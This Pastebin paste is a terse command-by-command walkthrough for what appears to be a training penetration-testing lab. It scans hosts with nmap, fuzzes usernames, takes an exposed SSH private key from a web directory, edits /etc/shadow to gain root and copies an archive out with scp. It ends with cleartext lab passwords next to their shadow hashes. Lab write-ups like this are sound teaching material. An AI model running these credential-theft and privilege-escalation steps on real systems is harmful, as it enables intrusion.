Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- nmap -n 192.168.2.1-255
- nmap -n -sV -sS -O 192.168.2.100
- nmap -n -sV -sS -O 192.168.2.101
- firefox 192.168.2.100
- [+]kate -> list of possible usernames. Save. Filename: usernames.txt
- firefox 192.168.2.101
- [+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80
- firefox 192.168.2.101/~pirrip
- [+]kate -> Update usernames with the ones which we got a respond from. Save.
- [+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
- ./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
- firefox 192.168.2.101/~pirrip/.ssh
- // Save both files
- mv /root/id_rsa /root/.ssh/id_rsa
- mv /root/id_rsa.pub /root/.ssh/id_rsa.pub
- chmod 000 /root/.ssh/id_rsa
- chmod 000 /root/.ssh/id_rsa.pub
- ssh pirrip@192.168.2.100
- // Yes
- mailx
- // 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
- cd /etc/
- vi passwd
- // kate -> Update usernames with only valid ones.
- vi group
- sudo vi shadow
- // edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
- su
- // Password: 0l1v3rTw1st
- cd /root/
- ls -a
- cd .save/
- ls -a
- chmod -R 777 /root/
- //In BackTrack//
- scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
- unzip great_expectations.zip
- tar xf great_expectations.tar
- strings Jan08
- //In SSH//
- sudo iv /var/mail/havisham
- modprobe capability
- //In BackTrack//
- ftp 192.168.2.100
- // Usrename: pirri. Password: 0l1v3rTw1st //
- ls -a
- //In SSH//
- exit
- //In BackTrack//
- [+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
- // GAME OVER
- ----------------------------------------------------------------------------------------------------
- Users
- root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
- havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
- pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
- magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
- ----------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement